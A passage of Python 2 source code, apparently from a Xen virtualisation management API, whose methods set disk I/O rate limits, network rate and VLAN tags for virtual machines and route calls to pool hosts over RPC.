#add by wufan
def _VM_set_all_rate(self, session, vm_ref, type, tag_list=None):
'''
@author: wuyuewen
@summary: Internal method. Set all VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param tag_list: dict of rate for each VIF, the structure is {eth_num : rate}, e.g. {0:1000, 1:1000}
@return: True | False.
@rtype: dict.
'''
log.debug('set vm all type: %s' % type)
if tag_list is None:
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
#log.debug('dom info %s' % dominfo.info)
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
for vif_ref in vif_refs:
tag = self._VM_get_rate(session, vm_ref, type, vif_ref).get('Value')
self._VM_set_rate( session, vm_ref, type, vif_ref, tag)
self._VM_update_rate(session, vm_ref, type, vif_refs)
else:
for eth_num, tag in tag_list.items():
self._VM_set_rate_by_ethnum(session, vm_ref, type, eth_num, tag)
return xen_api_success_void()
def VM_get_dev2path_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return xen_api_success(self._VM_get_dev2path_list(session, vm_ref))
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_dev2path_list', vm_ref)
else:
return xen_api_success(self._VM_get_dev2path_list(session, vm_ref))
'''
get device_type, img_path
return: {dev: img_path}
eg:
{'hda': '/home/sr_mount/2133.vhd'}
'''
def _VM_get_dev2path_list(self, session, vm_ref):
'''
@deprecated: not used
'''
storage = self._get_BNStorageAPI_instance()
dev2path_list = {}
vbd_refs = self._VM_get_VBDs(session, vm_ref).get('Value')
for vbd_ref in vbd_refs:
if self._VBD_get(vbd_ref, 'type').get('Value').lower() == 'disk':
dev = self._VBD_get(vbd_ref, 'device').get('Value')
# vdi_ref = self._VBD_get(vbd_ref, 'VDI').get('Value')
location = self._VBD_get(vbd_ref, 'uname').get('Value')
# location = storage._get_VDI(vdi_ref).location
dev2path_list[dev] = location
log.debug('_VM_get_dev2path_list')
log.debug(dev2path_list)
return dev2path_list
# when VM start ,async call to find IO pid
def VM_start_set_IO_limit(self, session, vm_ref, io_limit_list={}):
'''
@author: wuyuewen
@summary: Internal method.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return XendTask.log_progress(0, 100,
self.VM_start_init_pid2dev, session, vm_ref, io_limit_list)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_start_init_pid2dev', vm_ref, io_limit_list)
else:
return XendTask.log_progress(0, 100,
self.VM_start_init_pid2dev, session, vm_ref, io_limit_list)
# local call, called in VM_start_set_IO_limit
def VM_start_init_pid2dev(self, session, vm_ref, io_limit_list):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('VM_start_init_start_pid2dev')
max_count = 0
while True and max_count < 5:
max_count += 1
dom_id = self._VM_get_domid('', vm_ref).get('Value')
if dom_id and dom_id != '-1':
break
time.sleep(2)
if not dom_id:
log.exception('Init pid2dev failed, dom id is None!')
return xen_api_success_void()
max_count = 0
while True and max_count < 5:
max_count += 1
pid2dev_list = XendIOController.get_VM_pid2dev(dom_id)
if pid2dev_list:
break
time.sleep(2)
log.debug('get pid2dev_list:')
log.debug(pid2dev_list)
# self._VM_init_pid2devnum_list(session, vm_ref)
if io_limit_list:
for k, v in io_limit_list.items():
(type, io_unit) = k.split('_')
log.debug('Set disk io rate, type: %s %s, value: %s' % (type, io_unit, v))
self._VM_set_IO_rate_limit(session, vm_ref, type, v, io_unit)
else:
for type in ['read', 'write']:
for io_unit in ['MBps', 'iops']:
rate = self._VM_get_IO_rate_limit(session, vm_ref, type, io_unit).get('Value')
if rate != '-1':
log.debug('Set disk io rate, type: %s %s, value: %s' % (type, io_unit, rate))
self._VM_set_IO_rate_limit(session, vm_ref, type, rate, io_unit)
return xen_api_success_void()
'''get {VM_pid1: (major, minor1), VM_pid2: (major, minor2)}
and cache the result in memory
when start or migrate the vm, call this function
'''
def VM_init_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_init_pid2devnum_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_init_pid2devnum_list', vm_ref)
else:
return self._VM_init_pid2devnum_list(session, vm_ref)
def _VM_init_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
log.debug("VM_init_pid2devnum_list")
dev2path_list = self._VM_get_dev2path_list(session, vm_ref)
dom_id = self._VM_get_domid('', vm_ref).get('Value')
pid2devnum_list = XendIOController.get_VM_pid2num(dom_id, dev2path_list)
return self._VM_set_pid2devnum_list(session, vm_ref, pid2devnum_list)
#clear old pid2devnum_list before set
def _VM_set_pid2devnum_list(self, session, vm_ref, pid2devnum_list):
'''
@deprecated: not used
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('Set vm(%s) pid2devnum:' %(domname))
log.debug(pid2devnum_list)
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config']['pid2dev'] = {} #clear pid2dev_list
for pid, devnum in pid2devnum_list.items():
dominfo.info['other_config']['pid2dev'][pid] = devnum
self._VM_save(dominfo)
return xen_api_success(dominfo.info['other_config']['pid2dev'])
def VM_clear_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_clear_pid2devnum_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_clear_pid2devnum_list', vm_ref)
else:
return self._VM_clear_pid2devnum_list(session, vm_ref)
def _VM_clear_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('clear vm(%s) pid2devnum:' %(domname))
if dominfo.info.get('other_config', {}) and \
'pid2dev' in dominfo.info['other_config']:
del dominfo.info['other_config']['pid2dev']
self._VM_save(dominfo)
return xen_api_success_void()
def VM_get_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_pid2devnum_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_pid2devnum_list', vm_ref)
else:
return self._VM_get_pid2devnum_list(session, vm_ref)
def _VM_get_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
try:
pid2num_list = {}
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
if other_config:
pid2num_list = other_config.get('pid2dev',{})
#if can't get from memory, the excute cmd
if not pid2num_list:
log.debug("cant't get pid2devnum_list from memory, execute cmd")
pid2num_list = self._VM_init_pid2devnum_list(session, vm_ref).get('Value')
log.debug(pid2num_list)
return xen_api_success(pid2num_list)
except Exception, exn:
log.exception(exn)
return xen_api_success(pid2num_list)
def VM_get_vbd2device_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_vbd2device_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_vbd2device_list', vm_ref)
else:
return self._VM_get_vbd2device_list(session, vm_ref)
def _VM_get_vbd2device_list(self, session, vm_ref):
'''
@deprecated: not used
'''
try:
vbd2device_list = {}
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
if other_config:
vbd2device_list = other_config.get('vbd2device',{})
return xen_api_success(vbd2device_list)
except Exception, exn:
log.exception(exn)
return xen_api_success(vbd2device_list)
'''
type: read | write
flag = True:excute cgroup cmd
flag = False: just set value in config file
'''
def VM_set_IO_rate_limit(self, session, vm_ref, type, value, io_unit):
'''
@author: wuyuewen
@summary: Set VM disk IO rate by cgroup, can set both read/write rate(MBps).
@param session: session of RPC.
@param vm_ref: uuid
@param type: read/write.
@param value: rate(MBps).
@param io_unit: MBps | iops
@param flag: True: excute cgroup cmd, False: just set value in VM's config file.
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_IO_rate_limit(session, vm_ref, type, value, io_unit)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_IO_rate_limit', vm_ref, type, value, io_unit)
else:
return self._VM_set_IO_rate_limit(session, vm_ref, type, value, io_unit)
def _VM_set_IO_rate_limit(self, session, vm_ref, type, value, io_unit):
'''
@deprecated: not used
'''
#use /cgroup/blkio to constrol
try:
value = int(value)
if value >= 0:
if type not in ['write', 'read'] or io_unit not in ['MBps', 'iops']:
return xen_api_error(['INVALID_TYPE_OR_UNIT'])
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
tag = '%s_%s_rate' % (type, io_unit)
log.debug('Set vm(%s) %s: %s MBps' %(dominfo.getName(), tag, value))
dom_id = dominfo.getDomid()
dev2path_list = self._VM_get_dev2path_list(session, vm_ref)
pid2num_list = XendIOController.get_VM_pid2num(dom_id, dev2path_list)
XendIOController.set_VM_IO_rate_limit(pid2num_list, type, value, io_unit)
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config'][tag] = value
self._VM_save(dominfo)
# log.debug("current dominfo:>>>>>>>>>>>>")
# log.debug(dominfo.info['other_config'])
return xen_api_success_void()
elif value == -1:
tag = '%s_%s_rate' % (type, io_unit)
log.debug('%s dont have limit value' % tag)
else:
log.exception('VM set IO rate limit: value invalid')
return xen_api_error(['Value invalid'])
except Exception, exn:
log.exception(exn)
return xen_api_error(exn)
'''
limit vm rate:
flag = true :save config and excute cgroup cmd
flag = false: just save the limit rate config
'''
def _VM_set_IO_rate_limit_1(self, session, vm_ref, type, value, io_unit):
'''
@author: wuyuewen
@summary: Interal method. Set VM disk IO rate by cgroup, can set both read/write rate(MBps).
@param session: session of RPC.
@param vm_ref: uuid
@param type: read/write.
@param value: rate(MBps).
@param io_unit: MBps | iops
@param flag: True: excute cgroup cmd, False: just set value in VM's config file.
@return: True | False.
@rtype: dict.
'''
#use /cgroup/blkio to constrol
try:
value = int(value)
if value >= 0:
if type not in ['write', 'read'] or io_unit not in ['MBps', 'iops']:
return xen_api_error(['INVALID_TYPE_OR_UNIT'])
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
tag = '%s_%s_rate' % (type, io_unit)
log.debug('Set vm(%s) %s: %s MBps' %(domname, tag, value))
pid2num_list = self._VM_get_pid2devnum_list(session, vm_ref).get('Value')
XendIOController.set_VM_IO_rate_limit(pid2num_list, type, value, io_unit)
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config'][tag] = value
self._VM_save(dominfo)
# log.debug("current dominfo:>>>>>>>>>>>>")
# log.debug(dominfo.info['other_config'])
return xen_api_success_void()
else:
log.exception('VM set IO rate limit: value invalid')
return xen_api_error(['Value invalid'])
except Exception, exn:
log.exception(exn)
return xen_api_error(exn)
def VM_get_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_IO_rate_limit(session, vm_ref, type, io_unit)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_IO_rate_limit', vm_ref, type, io_unit)
else:
return self._VM_get_IO_rate_limit(session, vm_ref, type, io_unit)
def _VM_get_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
rate = '-1'
tag = '%s_%s_rate' % (type, io_unit)
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
if other_config:
rate = other_config.get(tag,'-1')
return xen_api_success(rate)
except Exception, exn:
log.exception(exn)
return xen_api_success(rate)
def VM_clear_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_clear_IO_rate_limit(session, vm_ref, type, io_unit)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_clear_IO_rate_limit', vm_ref, type, io_unit)
else:
return self._VM_clear_IO_rate_limit(session, vm_ref, type, io_unit)
def _VM_clear_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
if type not in ['write', 'read'] or io_unit not in ['MBps', 'iops']:
return xen_api_error(['INVALID_TYPE_OR_UNIT'])
pid2num_list = self._VM_get_pid2devnum_list(session, vm_ref).get('Value')
#use /cgroup/blkio to constrol
XendIOController.clear_VM_IO_rate_limit(pid2num_list, type, io_unit)
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
tag = '%s_%s_rate' % (type, io_unit)
log.debug('clear vm(%s) %s' %(domname, tag))
if dominfo.info.get('other_config', {}) and tag in dominfo.info['other_config']:
del dominfo.info['other_config'][tag] #clear config
self._VM_save(dominfo)
return xen_api_success_void()
def _VM_clean_IO_limit_shutdown(self, session, vm_ref):
'''
@deprecated: not used
'''
log.debug('shutdown clean: pid2dev and rate limit in cgroup file')
pid2num_list = self._VM_get_pid2devnum_list(session, vm_ref).get('Value')
for type in ['read', 'write']:
for io_unit in ['MBps', 'iops']:
XendIOController.clear_VM_IO_rate_limit(pid2num_list, type, io_unit)
self._VM_clear_pid2devnum_list(session, vm_ref)
return xen_api_success_void()
def VM_set_rate(self, session, vm_ref, param_type, vif_ref, value):
'''
@author: wuyuewen
@summary: Set VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param vif_ref: VIF uuid
@param value: VIF's rate(kbps)
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_rate(session, vm_ref, param_type, vif_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_rate', vm_ref, param_type, vif_ref,value)
else:
return self._VM_set_rate(session, vm_ref, param_type, vif_ref, value)
def _VM_set_rate(self, session, vm_ref, param_type, vif_ref, value):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param vif_ref: VIF uuid
@param value: VIF's rate(kbps)
@return: True | False.
@rtype: dict.
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('Set vm(%s) %s %s:%s' %(domname, str(vif_ref), param_type, value))
device = self.VIF_get_device(session, vif_ref).get('Value')
log.debug('vif_ref:%s VM_set_%s:%s rate:%s' % (vif_ref, param_type, device, value))
template = False
eth_num = ''
if device != '' and device.startswith('eth'):
eth_num = device[3:]
elif not device :
#log.debug('dom info %s' % dominfo.info)
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
#log.debug('vif refs: %s' % vif_refs)
try:
eth_num = str(vif_refs.index(vif_ref))
template = True
#log.debug('>>>>>>>eth_num" %s' % eth_num)
except:
eth_num = ''
pass
if eth_num != '':
log.debug('eth_num : %s ' % eth_num)
try:
if not template:
dominfo.set_rate(param_type, int(eth_num), value) # ovs_cmd
#self._VM_get_other_config(session, vm_ref) # in oder to convert other_config
dominfo.info.setdefault('other_config',{})
tag_list = dominfo.info['other_config'].setdefault(param_type,{})
dominfo.info['other_config'][param_type][eth_num] = value
#log.debug('other_config: %s' % value)
return self._VM_save(dominfo)
except Exception,exn:
log.debug(exn)
return xen_api_error(['device name invalid', device])
return xen_api_success_void()
def _VM_set_rate_by_ethnum(self, session, vm_ref, param_type, eth_num, value):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param eth_num: eth_num of VIF
@param value: VIF's rate(kbps)
@return: True | False.
@rtype: dict.
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('VM_set_%s:%s rate:%s' % ( param_type, eth_num, value))
dominfo.set_rate(param_type, int(eth_num), value) # ovs_cmd
#self._VM_get_other_config(session, vm_ref) # in oder to convert other_config
dominfo.info.setdefault('other_config',{})
tag_list = dominfo.info['other_config'].setdefault(param_type,{})
dominfo.info['other_config'][param_type][eth_num] = value
return self._VM_save(dominfo)
#add by wufan
def VM_set_all_tag(self, session, vm_ref, tag_list=None):
'''
@author: wuyuewen
@summary: Set all VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param tag_list: dict of tag for each VIF, the structure is {eth_num, tag_num} , e.g. {0:1, 1:2}
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_all_tag(session, vm_ref, tag_list)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_all_tag', vm_ref, tag_list)
else:
return self._VM_set_all_tag(session, vm_ref, tag_list)
#add by wufan
def _VM_set_all_tag(self, session, vm_ref, tag_list=None):
'''
@author: wuyuewen
@summary: Internal method. Set all VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param tag_list: dict of tag for each VIF, the structure is {eth_num, tag_num} , e.g. {0:1, 1:2}
@return: True | False
@rtype: dict.
'''
log.debug('set vm all tag')
if tag_list is None:
# xd = XendDomain.instance()
# dominfo = xd.get_vm_by_uuid(vm_ref)
# log.debug('dom info %s' % dominfo.info)
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
for vif_ref in vif_refs:
tag = self._VM_get_tag(session, vm_ref, vif_ref).get('Value')
#log.debug('tag:%s' % str(tag))
self._VM_set_tag( session, vm_ref, vif_ref, tag)
self._VM_update_tag(session, vm_ref, vif_refs)
else:
#tag_list is a dict
#log.debug('tag_list:%s' % tag_list)
for eth_num, tag in tag_list.items():
self._VM_set_tag_by_ethnum(session, vm_ref, eth_num, tag)
return xen_api_success_void()
def VM_set_tag(self, session, vm_ref, vif_ref, value, ovs=None):
'''
@author: wuyuewen
@summary: Set VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@param value: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_tag(session, vm_ref, vif_ref, value, ovs)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_tag', vm_ref, vif_ref, value, ovs)
else:
return self._VM_set_tag(session, vm_ref, vif_ref, value, ovs)
#original by wuyuewen
#def _VM_set_tag(self, session, vm_ref, value):
# xd = XendDomain.instance()
# dominfo = xd.get_vm_by_uuid(vm_ref)
# domname = dominfo.getName()
# tag = self._VM_get_tag(session, vm_ref).get('Value')
# if tag:
# log.debug('Set vm(%s) vlan: %s' % (domname, value))
# dominfo.set_tag(value)
# return self._VM_add_to_other_config(session, vm_ref, "tag", value)
#add by wufan
def _VM_set_tag(self, session, vm_ref, vif_ref, value, ovs):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@param value: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@return: True | False
@rtype: dict.
'''
xennode = XendNode.instance()
xenapi = self._get_XendAPI_instance()
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
if not xd.is_valid_dev("vif", vif_ref):
return xen_api_error(['VIF_NOT_EXISTS'])
device = self.VIF_get_device(session, vif_ref).get('Value')
bridge = xd.get_dev_property_by_uuid('vif', vif_ref, 'bridge')
# network_org = xd.get_dev_property_by_uuid('vif', vif_ref, 'network')
log.debug('Set vm(%s) %s vlan: %s ovs: %s bridge: %s' %(domname, str(vif_ref), value, ovs, bridge))
# log.debug('vif_ref:%s VM_set_tag:%s vlanid:%s' % (vif_ref, device, value))
eth_num = -1
if device and device.startswith('eth'):
eth_num = device[3:]
else:
vifs = self._VM_get_VIFs(session, vm_ref).get('Value')
if vif_ref in vifs:
eth_num = vifs.index(vif_ref)
if ovs and cmp(ovs, bridge) != 0:
xennode._init_networks()
is_valid_network = xennode.is_valid_network(ovs)
if not is_valid_network:
return xen_api_error(['OVS_NOT_EXISTS'])
network_new = None
list_network_new = xenapi.network_get_by_name_label(session, ovs).get('Value')
if list_network_new:
network_new = list_network_new[0]
dominfo.switch_vif_to_different_ovs_and_set_tag(int(eth_num), value, ovs, bridge)
try:
# rc = self._VIF_set(vif_ref, 'network', network_new, network_org)
rc1 = self._VIF_set(vif_ref, 'bridge', ovs, bridge)
if not rc1:
dominfo.switch_vif_to_different_ovs_and_set_tag(int(eth_num), value, bridge, ovs)
return xen_api_error(['VIF_SET_BRIDGE_ERROR'])
except Exception, e:
dominfo.switch_vif_to_different_ovs_and_set_tag(int(eth_num), value, bridge, ovs)
raise e
else:
dominfo.set_tag(int(eth_num), value) # ovs_cmd
#self._VM_get_other_config(session, vm_ref) # in oder to convert other_config
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config'].setdefault('tag',{})
dominfo.info['other_config']['tag'][eth_num] = value
self._VM_save(dominfo)
return xen_api_success_void()
def _VM_set_tag_by_ethnum(self, session, vm_ref, eth_num, value):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's tag(VLAN-ID) by eth_num, this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param eth_num: eth_num of VIF
@param value: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@return: True | False
@rtype: dict.
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('Set vm(%s) %s vlan:%s' %(domname, str(eth_num), value))
dominfo.set_tag(int(eth_num), value) # ovs_cmd
#self._VM_get_other_config(session, vm_ref) # in oder to convert other_config
dominfo.info.setdefault('other_config',{})
tag_list = dominfo.info['other_config'].setdefault('tag',{})
dominfo.info['other_config']['tag'][eth_num] = value
return self._VM_save(dominfo)
def VM_remove_from_other_config(self, session, vm_ref, key):
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_remove_from_other_config(session, vm_ref, key)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_remove_from_other_config', vm_ref, key)
else:
return self._VM_remove_from_other_config(session, vm_ref, key)
def _VM_remove_from_other_config(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom and 'other_config' in dom.info \
and key in dom.info['other_config']:
del dom.info['other_config'][key]
return self._VM_save(dom)
else:
return xen_api_success_void()
def VM_get_crash_dumps(self, _, vm_ref):
'''
@deprecated: not used
'''
return xen_api_todo()
def verify(self, ip):
'''
@deprecated: not used
'''
try:
proxy = ServerProxy("http://" + ip + ":9363/")
response = proxy.session.login('root')
except socket.error:
return False
else:
if cmp(response['Status'], 'Failure') == 0:
return False
return True
def VM_get_suspend_VDI(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_suspend_VDI(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_suspend_VDI', vm_ref)
else:
return self._VM_get_suspend_VDI(session, vm_ref)
def _VM_get_suspend_VDI(self, session, vm_ref):
'''
@deprecated: not used
'''
xennode = XendNode.instance()
return xen_api_success(xennode.get_suspend_VDI(vm_ref))
def VM_get_suspend_SR(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_suspend_SR(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_suspend_SR', vm_ref)
else:
return self._VM_get_suspend_SR(session, vm_ref)
def _VM_get_suspend_SR(self, session, vm_ref):
'''
@deprecated: not used
'''
xennode = XendNode.instance()
return xen_api_success(xennode.get_suspend_SR(vm_ref))
# class methods
def VM_get_all_and_consoles(self, session):
'''
@deprecated: not used
'''
VM_and_consoles = {}
for d in XendDomain.instance().list('all'):
vm_uuid = d.get_uuid()
if cmp(vm_uuid, DOM0_UUID) == 0:
continue
dom = XendDomain.instance().get_vm_by_uuid(vm_uuid)
vm_consoles = []
for console in dom.get_consoles():
vm_consoles.append(console)
VM_and_consoles[vm_uuid] = vm_consoles
return xen_api_success(VM_and_consoles)
# def VM_get_all(self, session):
# refs = self._VM_get_all()
# if BNPoolAPI._isMaster:
# host_ref = XendNode.instance().uuid
# for key in BNPoolAPI.get_hosts():
# if cmp(key, host_ref) != 0:
# ip = BNPoolAPI.get_host_ip(key)
# refs += xen_rpc_call(ip, "VM_get_all")
#
# return xen_api_success(refs)
def VM_get_all(self, session):
'''
@author: wuyuewen
@summary: Get all guest VMs.
@param session: session of RPC.
@return: list of VMs uuid.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
refs = []
refs.extend(self._VM_get_all(session).get('Value'))
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
# log.debug(remote_ip)
refs.extend(xen_rpc_call(remote_ip, 'VM_get_all').get('Value'))
return xen_api_success(refs)
else:
return self._VM_get_all(session)
def _VM_get_all(self, session):
'''
@author: wuyuewen
@summary: Internal method. Get all guest VMs.
@param session: session of RPC.
@return: list of VMs uuid.
@rtype: dict.
'''
refs = [d.get_uuid() for d in XendDomain.instance().list('all')
if d.get_uuid() != DOM0_UUID]
if refs:
return xen_api_success(refs)
else:
return xen_api_success([])
def VM_get_by_name_label(self, session, label):
'''
@author: wuyuewen
@summary: Get VM by VM's name label.
@param session: session of RPC.
@param label: name label of VM
@return: VM.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
refs = []
refs.extend(self._VM_get_by_name_label(session, label)['Value'])
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
refs.extend(xen_rpc_call(remote_ip, 'VM_get_by_name_label', label)['Value'])
return xen_api_success(refs)
else:
return self._VM_get_by_name_label(session, label)
def _VM_get_by_name_label(self, session, label):
'''
@author: wuyuewen
@summary: Internal method. Get VM by VM's name label.
@param session: session of RPC.
@param label: name label of VM
@return: VM.
@rtype: dict.
'''
xendom = XendDomain.instance()
uuids = []
dom = xendom.domain_lookup_by_name_label(label)
if dom:
return xen_api_success([dom.get_uuid()])
return xen_api_success([])
def VM_get_security_label(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
label = dom.get_security_label()
return xen_api_success(label)
def VM_set_security_label(self, session, vm_ref, sec_label, old_label):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
(rc, errors, oldlabel, new_ssidref) = \
dom.set_security_label(sec_label, old_label)
if rc != xsconstants.XSERR_SUCCESS:
return xen_api_error(['SECURITY_ERROR', rc,
xsconstants.xserr2string(-rc)])
if rc == 0:
rc = new_ssidref
return xen_api_success(rc)
def VM_create_on(self, session, vm_struct, host_ref):
'''
@author: wuyuewen
@summary: A Pool range method, create a VM on a Host in Pool.
@precondition: vm_struct is legal, vm name not duplicated.
@param session: session of RPC.
@param vm_struct: dict of vm structure
@param host_ref: VM create on which Host.
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
